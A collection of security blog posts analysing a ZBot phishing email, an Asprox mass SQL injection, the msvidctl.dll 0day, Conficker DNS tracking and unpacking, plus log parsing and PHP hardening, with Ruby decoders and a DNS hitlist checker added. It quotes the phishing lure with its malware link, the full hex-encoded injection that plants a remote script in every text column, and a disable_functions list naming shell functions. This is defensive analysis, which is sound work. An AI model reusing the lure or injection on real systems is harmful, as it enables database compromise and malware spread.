Attention – Mail server upgrade

Attention!

On October 22, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.

The changes will concern security, reliability and performance of mail service and the system as a whole.

For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.

This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That’s all.

http://updates.<some-domain>.secure.<some-evil-domain>/ssl/id=7906947-<some-address>-list@<some-domain>-patch263.exe

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

System Administrator

Nice trick! But no thanks! Here are some details of the downloaded binary:

File name: patch.exe

MD5 sum: 0ee4f395dd071f169e95e34454bbf446

ThreatExpert Summary: Threat characteristics of ZBot - a banking trojan that disables firewall, steals sensitive financial data (credit card numbers, online banking login details), makes screen snapshots, downloads additional components, and provides a hacker with the remote access to the compromised system.

I assumed that it was a targeted attack and that the attacker created subdomains that look like the real servers for each email they send. But I was totally wrong.

No matter what subdomain you use (or even no subdomain at all), and whatever file you request, as long as the file extension is .EXE the server will still respond with HTTP/1.1 301 Moved Permanently and redirect you to the binary file.


WGET with no subdomain


WGET with random file name

More technical information on the downloaded binary:

  1. VirusTotal
  2. ThreatExpert

Mass SQL Injection And Asprox Bot

Asprox is one of the botnets that implements mass SQL injection to inject a malicious *.js script into MSSQL database servers. Normally the Asprox bot searches for any vulnerable (to SQL injection, of course) *.asp script and injects the malicious *.js script/iframe into the database. A typical injection looks like the log below:

GET /page.asp?id=425;d EcLaRe @s VArcHAr(4000);sET @s=cASt(0x4445636C615245204054205661 724348415228323535292C40632056417263 6841722832353529204465436C4152652074 41626C655F437572736F7220437552736F72 20664F522073454C45637420612E6E416D65 2C622E6E414D452066726F6D207359734F62 6A4563547320612C735973636F4C756D6E73 206220774845726520412E69643D622E4964 20614E4420612E78547970653D2755272061 4E642028622E78745950653D3939206F7220 422E78545970453D3335204F7220622E7874 5950453D323331206F5220622E5874595065 3D31363729206F50456E207441426C655F43 7572734F72204665544368206E4558742066 724F6D205441426C655F637572734F522069 4E744F2040542C4043205748494C45284040 46457443685F5354415475533D3029204245 47696E20657865432827757044417465205B 272B40542B275D20534574205B272B40432B 275D3D527452696D28434F6E564552542856 4152636841522834303030292C5B272B4043 2B275D29292B434173742830783343373336 333732363937303734323037333732363333 443638373437343730334132463246373737 373737324536323631364536453635373237 343245373237353246363136343733324536 413733334533433246373336333732363937 303734334520417320564152634841722835 3129292729204645546348204E4558542066 726F6D207441626C655F435572734F722049 4E744F2040542C404320456E6420434C6F73 45207461626C455F635572736F5220644541 6C4C4F63617465207441624C655F43757273 6F7220 AS vaRcHaR(4000));eXeC (@s);--
HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
*/*;q=0.1
Accept-Language: en-gb
Accept-Encoding: deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20090728 Firefox/1.5.0 Opera 9.25
Host: www.xxxx.com
Connection: Close

It’s a little bit annoying to decode all the hex characters. It’s obvious that the SQL injection input is built to bypass string-based content filtering :). Out of curiosity about this SQL injection, I wrote a little Ruby script to decode it (the usual trick of smuggling the statement as hex and converting it back with the CAST function). Below is the result, a sample usage of the code and sample output:

shell>$ruby hex2ascii.rb '4445636C615245204054205661 724348415228323535292C40632056417263 6841722832353529204465436C4152652074 41626C655F437572736F7220437552736F72 20664F522073454C45637420612E6E416D65 2C622E6E414D452066726F6D207359734F62 6A4563547320612C735973636F4C756D6E73 206220774845726520412E69643D622E4964 20614E4420612E78547970653D2755272061 4E642028622E78745950653D3939206F7220 422E78545970453D3335204F7220622E7874 5950453D323331206F5220622E5874595065 3D31363729206F50456E207441426C655F43 7572734F72204665544368206E4558742066 724F6D205441426C655F637572734F522069 4E744F2040542C4043205748494C45284040 46457443685F5354415475533D3029204245 47696E20657865432827757044417465205B 272B40542B275D20534574205B272B40432B 275D3D527452696D28434F6E564552542856 4152636841522834303030292C5B272B4043 2B275D29292B434173742830783343373336 333732363937303734323037333732363333 443638373437343730334132463246373737 373737324536323631364536453635373237 343245373237353246363136343733324536 413733334533433246373336333732363937 303734334520417320564152634841722835 3129292729204645546348204E4558542066 726F6D207441626C655F435572734F722049 4E744F2040542C404320456E6420434C6F73 45207461626C455F635572736F5220644541 6C4C4F63617465207441624C655F43757273 6F7220'
[+] encoded string : DEclaRE @T VarCHAR(255),@c VArchAr(255) DeClARe tAble_Cursor CuRsor fOR sELEct a.nAme,b.nAME from sYsObjEcTs a,sYscoLumns b wHEre A.id=b.Id aND a.xType='U' aNd (b.xtYPe=99 or B.xTYpE=35 Or b.xtYPE=231 oR b.XtYPe=167) oPEn tABle_CursOr FeTCh nEXt frOm TABle_cursOR iNtO @T,@C WHILE(@@FEtCh_STATuS=0) BEGin exeC('upDAte ['+@T+'] SEt ['+@C+']=RtRim(COnVERT(VARchAR(4000),['+@C+']))+CAst(0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E As VARcHAr(51))') FETcH NEXT from tAble_CUrsOr INtO @T,@C End CLosE tablE_cUrsoR dEAlLOcate tAbLe_Cursor

Since this SQL injection uses the hex trick twice (a second hex payload inside the first), I needed to run the code again for this one:

CAst(0x3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E)
shell>$ ruby hex2ascii.rb 3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E
[+] encoded string : <script src=http://www.bannert.ru/ads.js></script>

All the output then needs to be concatenated back with the surrounding string, AS vaRcHaR(4000));eXeC (@s);--. So the final SQL statement will look similar to this:

d EcLaRe @s VArcHAr(4000);sET @s=DEclaRE @T VarCHAR(255),@c VArchAr(255) DeClARe tAble_Cursor CuRsor fOR sELEct a.nAme,b.nAME from sYsObjEcTs a,sYscoLumns b wHEre A.id=b.Id aND a.xType='U' aNd (b.xtYPe=99 or B.xTYpE=35 Or b.xtYPE=231 oR b.XtYPe=167) oPEn tABle_CursOr FeTCh nEXt frOm TABle_cursOR iNtO @T,@C WHILE(@@FEtCh_STATuS=0) BEGin exeC('upDAte ['+@T+'] SEt ['+@C+']=RtRim(COnVERT(VARchAR(4000),['+@C+']))+CAst(<script src=http://www.bannert.ru/ads.js></script> As VARcHAr(51))') FETcH NEXT from tAble_CUrsOr INtO @T,@C End CLosE tablE_cUrsoR dEAlLOcate tAbLe_Cursor AS vaRcHaR(4000));eXeC (@s);--

From the output we know that the attacker is trying to inject <script src=http://www.bannert.ru/ads.js></script> into every text column of every user table in the database. This script tag, served from the compromised database/web server, will later be used like an iframe to silently fetch ads.js. Unfortunately, ads.js was no longer available when this blog entry was posted.

Below is the simple Ruby code for decoding the hex values. You need to supply the hex value found inside the CAST() function as input.

#!/usr/bin/ruby
# Copy this code and save it as hex2ascii.rb.
# Decodes the hex string found inside CAST(0x... AS VARCHAR(n)) back to text.
def usage
   puts "[+] usage: ruby hex2ascii.rb hex_string"
end

data = ARGV[0]
if data.nil?
   usage
else
   data = data.delete(" ")                     # drop spaces left over from line wrapping
   unless data =~ /\A(?:[0-9a-fA-F]{2})+\z/    # must be whole bytes made of hex digits
      puts "[-] input is not an even-length hex string"
      exit 1
   end
   # each pair of hex digits is one byte; join the bytes into the decoded text
   result = data.scan(/../).map { |pair| pair.hex.chr }.join
   puts "[+] encoded string : #{result}"
end

Here is how you can use the code:

shell>$ ruby hex2ascii.rb '3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E'
[+] encoded string : <script src=http://www.bannert.ru/ads.js></script>

* Don’t forget to put quotes ('...') around the input when you key it in.
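Because the injection above hides one hex payload inside another, the decoder had to be run twice. The following script, added here as an example and not part of the blog's hex2ascii.rb, decodes every CAST(0x...) literal in a request and repeats until nothing is left to decode, then applies a small defender-side check for the indicators seen in the request at the top of this post (a hex CAST, an EXEC of the assembled string and the sysobjects/syscolumns cursor). The inner <script> hex is the one from the post; the outer cursor statement and the request line are shortened, constructed samples, and HEX_CAST, decode_nested and asprox_style? are names chosen for this example.

```ruby
#!/usr/bin/env ruby
# Added example, not the post's hex2ascii.rb: decode the CAST(0x...) hex literals of an
# Asprox-style injection, including a payload hidden inside an already decoded payload
# (the "double hex trick" the post had to decode in two runs), and flag such a request.

# Matches "cAsT(0x4445..." whatever letter case the bot used to dodge string filters.
HEX_CAST = /cast\s*\(\s*0x([0-9a-f]+)/i

# "4445" -> "DE". Whitespace inserted by line wrapping is ignored; non-hex input is rejected.
def decode_hex(hex)
  clean = hex.delete(" \t\r\n")
  raise ArgumentError, "not an even-length hex string" unless clean =~ /\A(?:[0-9a-fA-F]{2})+\z/
  [clean].pack("H*").force_encoding("UTF-8").scrub("?")
end

# Replace every CAST(0x...) literal with its decoded text and repeat, so a CAST(0x...) that
# only appears after the first decoding round is decoded too. Capped to avoid endless loops.
def decode_nested(sql, max_rounds = 10)
  out = sql.dup
  max_rounds.times do
    replaced = out.gsub(HEX_CAST) { "CAST(#{decode_hex(Regexp.last_match(1))}" }
    return replaced if replaced == out
    out = replaced
  end
  out
end

# Indicators taken from the request in the post: a hex CAST, an EXEC(@var) of the built
# string, and the sysobjects/syscolumns cursor that walks every text column of every table.
def asprox_style?(request_line)
  return false unless request_line =~ HEX_CAST
  decoded = decode_nested(request_line)
  !!(decoded =~ /\bexec\s*\(\s*@\w+\s*\)/i && decoded =~ /sysobjects/i && decoded =~ /syscolumns/i)
end

# Constructed sample request: the inner <script> hex is the one from the post, the outer
# cursor statement is a shortened version that is hex-encoded here the same way the bot does.
INNER_HEX = "3C736372697074207372633D687474703A2F2F7777772E62616E6E6572742E72752F6164732E6A733E3C2F7363726970743E"
OUTER_SQL = "DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR " \
            "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='U' " \
            "EXEC('UPDATE ['+@T+'] SET ['+@C+']=['+@C+']+CAST(0x#{INNER_HEX} AS VARCHAR(51))')"
OUTER_HEX = OUTER_SQL.unpack("H*").first
SAMPLE_REQUEST = "GET /page.asp?id=425;dEcLaRe @s VaRcHaR(4000);sEt @s=cAsT(0x#{OUTER_HEX} AS VaRcHaR(4000));eXeC(@s);-- HTTP/1.1"

if __FILE__ == $PROGRAM_NAME
  puts decode_nested(ARGV[0] || SAMPLE_REQUEST)
  puts "[+] asprox-style injection: #{asprox_style?(ARGV[0] || SAMPLE_REQUEST)}"
end
```

Run it with a raw request line as the single argument (quoted) to see the fully decoded statement; the case-insensitive regexes matter because, as the captured request shows, the bot randomises letter case precisely to defeat exact-string filters.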

Microsoft DirectShow msvidctl.dll 0day

Another 0-day was released in the wild targeting Microsoft Internet Explorer. The bug is inside msvidctl.dll when it handles a media file (*.gif files have been used in the in-the-wild exploitation). Below is the in-the-wild exploit as analysed by us (we replaced the shellcode with 0xCC bytes).

Figure 1.0 shows the exception handler being executed and pointing to our jump address (0c0c0c0c).

Figure 2.0 shows the shellcode (0xCC) being executed.


It’s not really a common stack overflow bug. Please read the excellent vulnerability analysis done by Websense here.

We released an advisory and workaround (yes, with pictures) on how to set the ‘kill-bit’ for this particular CLSID.

Conficker.C and DNS

We have been working on tracking Conficker’s DNS queries in order to identify machines/networks infected with Conficker.C. Tracking 50K DNS names and 500++ queries from each Conficker instance is a bit troublesome when you have to record all DNS queries (200M records/day) and compare them with the 50K/day Conficker.C domain names. :) The main idea is that an infected machine can be identified by the queries Conficker.C makes to contact its C&C. Below is one of the results from our tracking of Conficker.C DNS queries to the .MY domains in the hitlist:
Conficker's DNS Queries to .MY

Another one:
Another Conficker's DNS Queries to .MY

Looking at the trends in both pictures, the queries come from the same source (see the geomap overlay). Why? :)

The tracker is basically Ruby code built on the dnsruby and ruby-pcap libraries: it collects packets and processes only the DNS ones. So far the tracker works fine, except when it receives malformed DNS traffic, which it normally discards.

Automated Unpacking Conficker Worm Variant B

The infamous worm Conficker, which surfaced on 21 November 2009 and is set to time-bomb on 1 April 2009, was literally all over the media. Although studying the malware source code is the best way to fully understand its features and impact, getting hold of the source code is usually impossible. There is still an alternative: reverse engineering the binary. A lot of malware writers use a packer to pack their malware, either one they wrote themselves or one downloaded from the internet. During the analysis of Conficker, MyCERT found that the worm has been compressed by a custom “run-time packer”. This section focuses on a technique for automated unpacking of Conficker worm variant B.

Useful tools:

  1. OllyDbg v1.10 [Download: http://www.ollydbg.de/ ]
  2. OllyScript v1.67.3 [Download: http://odbgscript.sourceforge.net/ ]
  3. Script [Download: https://blog.honeynet.org.my/mirror/Uncompress_ConfickerB_version2.osc ]

Steps:

  1. Copy the files “ODbgScript.dll” and “Uncompress_ConfickerB_version2.osc” into the OllyDbg folder.
  2. Open OllyDbg.exe and load the Conficker variant B binary.
  3. Check that the packer entry signature is as below:
    1. CMP BYTE PTR SS:[ESP+8], 1
    2. JNZ conficker.xxxxxxxx
  4. Open the OllyScript window with “Plugins” -> “ODbgScript” -> “Script Window”.
  5. Right-click in the OllyScript window -> select “Run Script” -> “Open” to open the file “Uncompress_ConfickerB_version2.osc”. The script runs automatically and unpacks the Conficker binary; OllyDbg then lands at the Original Entry Point (OEP) of the binary.

Conficker: The other not so famous Variant A

There is a lot more discussion going on about Conficker variant C (ConfickerC) because of 1st April. Why 1st April? That is the day ConfickerC should call home for updates. The domain name generation algorithm used by ConfickerC makes blocking or detecting live ConfickerC update servers harder, since the worm will search about 50K domain names. :D Please refer to SRI’s excellent write-up for more information about ConfickerC here. MyCERT’s advisory about ConfickerC is here.

I can’t say much about the current situation, but based on my observation of the DNS traffic we have, we only observed a low volume of traffic contacting ConfickerC domain names hosted in the .my domain. Maybe it wasn’t the time yet (my observation timeframe was 27-29 March 09).

Compared to ConfickerC, for ConfickerA (variant A) we observed more traffic looking for the domain name trafficconverter.biz, which is the server ConfickerA contacts. Take a look at a ConfickerA file sample and you will see the domain name. It is very disturbing to notice that variant A is still out there screaming for its C&C server while most of the discussion has switched to ConfickerC.

....................SNIP ...............SNIP....................
....................SNIP ...............SNIP....................

Sat Mar 28 17:29:00 +0800 2009 - 202.XXX.YY.132 is looking for trafficconverter.biz.XXX.my
Sat Mar 28 16:32:07 +0800 2009 - XXX.60.YY.229 is looking for trafficconverter.biz.XXX.my
Sat Mar 28 15:29:41 +0800 2009 - 203.XXX.YY.85 is looking for trafficconverter.biz.XXX.my
Sat Mar 28 15:46:26 +0800 2009 - 202.YY.56.XXX is looking for trafficconverter.biz.XXX.my
Sat Mar 28 15:15:55 +0800 2009 - 202.XX.XX.229 is looking for trafficconverter.biz.XXX.XXX.my

....................SNIP ...............SNIP....................
....................SNIP ...............SNIP....................

During the timeframe (27-29 March 09) there were about 1167+ DNS queries looking for trafficconverter.biz. Judged by DNS query traffic alone, that is still a big infection. Luckily trafficconverter.biz is no longer running, but the infected machines still need to be cleaned up.

We have already released our advisory for ConfickerA, which also mentions tools that can be used to remove it. The advisory is here. If you haven’t patched MS08-067, please do so.
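The two Conficker posts above describe the same job from two angles: a tracker that picks the DNS queries out of captured packets and compares them with a hitlist, and a log in which the resolver has appended a local search suffix to the name (trafficconverter.biz.XXX.my). The script below is an added example, not MyCERT's dnsruby/ruby-pcap tracker: it parses the question section of a raw DNS query, discards malformed packets the way the tracker does, and matches the name against a hitlist while tolerating such a search suffix. The hitlist (one real name from the post plus placeholder entries), the captures and the documentation-range source addresses are constructed for this example; build_query, parse_qname, hitlist_match and summarize are names chosen here.

```ruby
#!/usr/bin/env ruby
# Added example, not MyCERT's dnsruby/ruby-pcap tracker: pull the QNAME out of a raw DNS
# query packet and match it against a Conficker hitlist, discarding malformed packets the
# way the tracker does. It also tolerates the resolver search suffix visible in the log
# above ("trafficconverter.biz.XXX.my").

# Constructed hitlist: the real ConfickerA name from the post plus placeholder names.
HITLIST = %w[trafficconverter.biz dga-placeholder-1.my dga-placeholder-2.my].freeze

# Build a minimal DNS A query in wire format so the parser can be exercised offline.
def build_query(name, id = 0x1234)
  header = [id, 0x0100, 1, 0, 0, 0].pack("nnnnnn")       # id, flags (RD), qd/an/ns/ar counts
  labels = name.split(".").map { |l| [l.length, l].pack("Ca*") }.join
  header + labels + "\x00" + [1, 1].pack("nn")            # root label, QTYPE=A, QCLASS=IN
end

# Return the lower-cased QNAME of the first question, or nil if the packet is malformed
# (short header, oversize label, compression pointer in the question, missing terminator).
def parse_qname(packet)
  pkt = packet.b
  return nil if pkt.bytesize < 12
  return nil if pkt[4, 2].unpack("n").first < 1          # QDCOUNT must be at least 1
  pos = 12
  labels = []
  loop do
    return nil if pos >= pkt.bytesize
    len = pkt.getbyte(pos)
    pos += 1
    break if len.zero?
    return nil if len > 63 || pos + len > pkt.bytesize   # 0xC0 pointers and overruns rejected
    labels << pkt[pos, len]
    pos += len
  end
  return nil if pos + 4 > pkt.bytesize                   # QTYPE and QCLASS must follow
  labels.join(".").downcase
end

# Return the hitlist entry a query matches, or nil. A stub resolver often appends its search
# domain, so "trafficconverter.biz.xxx.my" is treated as a hit for "trafficconverter.biz".
def hitlist_match(qname, hitlist = HITLIST)
  hitlist.find { |d| qname == d || qname.start_with?("#{d}.") }
end

# Map each source address to the hitlist names it asked for, skipping malformed packets.
def summarize(captures, hitlist = HITLIST)
  hits = Hash.new { |h, k| h[k] = [] }
  captures.each do |src, packet|
    qname = parse_qname(packet)
    next if qname.nil?
    domain = hitlist_match(qname, hitlist)
    hits[src] << domain if domain
  end
  hits
end

# Constructed captures (documentation-range addresses), standing in for pcap input.
CAPTURES = [
  ["192.0.2.132",  build_query("trafficconverter.biz.xxx.my")],  # search suffix appended
  ["203.0.113.85", build_query("trafficconverter.biz")],
  ["198.51.100.7", build_query("www.example.com")],
  ["198.51.100.9", "\x12\x34\x01".b],                            # truncated: discarded
  ["192.0.2.132",  build_query("dga-placeholder-2.my")],
].freeze

if __FILE__ == $PROGRAM_NAME
  summarize(CAPTURES).each { |src, names| puts "#{src} is looking for #{names.join(', ')}" }
end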

Log Files: Dealing with an Inconsistent Field Delimiter

Salam,

Log files are big. Processing them would be cumbersome, especially if the field separator is not unique.

Take a look at the contents of the file example.log below:

"209.34.23.99",6667,"Rembau, NSembilan,Malaysia","GET /phpmyadmin ",404
"238.34.23.99",80,"Selangor","GET /phpmyadmin/ ,200
"21.34.23.99",9090,"A. Star, Kedah, Malysia","GET /phpmyadmin/favicon.ico,404
"120.34.23.99",6667,"Malysia","GET /phpmyadmin/print.css,404
"2.34.23.99",993,"A. Star, Kedah, Malysia","GET /phpmyadmin/phpmyadmin.css.php?lang=en-utf-8,404

At first sight, anybody would agree to use ',' as the field separator. But the third field contains that same character.

If we insist on choosing ',' as our separator, the field count will not be consistent throughout the file: line 1 has 7 fields, line 2 has 5 fields, and so on.

If the task is to print the IP address and the file requested, how should we do that?

Luckily gawk has a special variable, NF, which holds the number of fields.
To print just the first and second fields using gawk:

gawk -F ',' '{print $1, $2}' example.log

# -F tells gawk which character is the field separator

In example.log, the file requested is always in the second-to-last column: on line 1 it is in field 6, while on line 2 it is in field 4.

In this case we can use gawk's NF, which holds the number of fields in each line. To get the second-to-last column we use $(NF-1), as below:

gawk -F ',' '{print $1, $(NF-1)}' example.log
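The same idea carried a little further in Ruby, as an added example and not the post's own one-liner: fields are anchored from both ends of the line ($1 from the front, $(NF-1) and $NF from the back) so the variable number of commas inside the location field does not matter, stray quotes from the unclosed request fields are dropped, and the per-line field count is exposed so the inconsistency is visible. The example.log lines from the post are embedded as the input; field_counts and extract are names chosen for this example.

```ruby
#!/usr/bin/env ruby
# Added example, not the post's gawk one-liner: the "count from the end" idea in Ruby,
# applied to the example.log lines from the post (embedded here as constructed input).

EXAMPLE_LOG = <<~LOG
  "209.34.23.99",6667,"Rembau, NSembilan,Malaysia","GET /phpmyadmin ",404
  "238.34.23.99",80,"Selangor","GET /phpmyadmin/ ,200
  "21.34.23.99",9090,"A. Star, Kedah, Malysia","GET /phpmyadmin/favicon.ico,404
  "120.34.23.99",6667,"Malysia","GET /phpmyadmin/print.css,404
  "2.34.23.99",993,"A. Star, Kedah, Malysia","GET /phpmyadmin/phpmyadmin.css.php?lang=en-utf-8,404
LOG

# Number of comma-separated fields per line (what gawk's NF reports with -F ','): it varies
# because the location field carries commas of its own.
def field_counts(log)
  log.each_line.map { |line| line.chomp.split(",", -1).size }
end

# Extract [ip, request, status] per line. The IP is anchored at the start, the request and
# status at the end ($(NF-1) and $NF), so the variable-width middle is skipped over. Quotes
# are stripped because some request fields are never closed; a non-numeric status becomes nil.
def extract(log)
  log.each_line.map do |line|
    f = line.chomp.split(",", -1)
    next nil if f.size < 3                       # too short to hold ip, request and status
    ip      = f[0].delete('"')
    request = f[-2].delete('"').strip
    status  = f[-1].strip =~ /\A\d+\z/ ? f[-1].strip.to_i : nil
    [ip, request, status]
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  extract(EXAMPLE_LOG).each { |ip, request, status| puts "#{ip} #{request} #{status}" }
end
```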

Hope that helps.

Securing PHP : Disabling Dangerous PHP Functions

PHP is a very popular language nowadays, but at the same time it is also one of the main reasons user accounts and servers get compromised. Every PHP developer and hoster should understand the primary attack vectors used by attackers against PHP applications. They should also be able to classify which PHP functions are allowed and disable certain functions that can be categorised as dangerous.

Based on my experience, and with a big help from Google, I categorise the functions named in the disable_functions line below as dangerous.

First verify the location of your php.ini: run phpinfo() and look for “Configuration File (php.ini) Path” in its output.

Now, edit the configuration file with root permission

sudo nano /etc/php5/apache2/php.ini

Look for disable_functions = "" and change it to

disable_functions = "shell_exec, eval, exec, system, proc_get_status, inject_code, proc_nice, proc_open, proc_terminate, apache_child_terminate, apache_setenv, ftp_fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, popen, escapeshellcmd, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, syslog, xmlrpc_entity_decode, proc_close, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, passthru, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, mysql_pconnect, escapeshellarg, highlight_file, define_syslog_variables, ini_restore, ini_alter, ini_get_all, openlog"

Make sure you save before exit.

Now restart Apache for the changes to take effect.

The default PHP configuration is intended for development. Therefore it is always advisable to reconfigure PHP before going into production. Some security settings are also recommended during development, to stop programmers from producing vulnerable code and make them stick to secure techniques.

Until next episode..
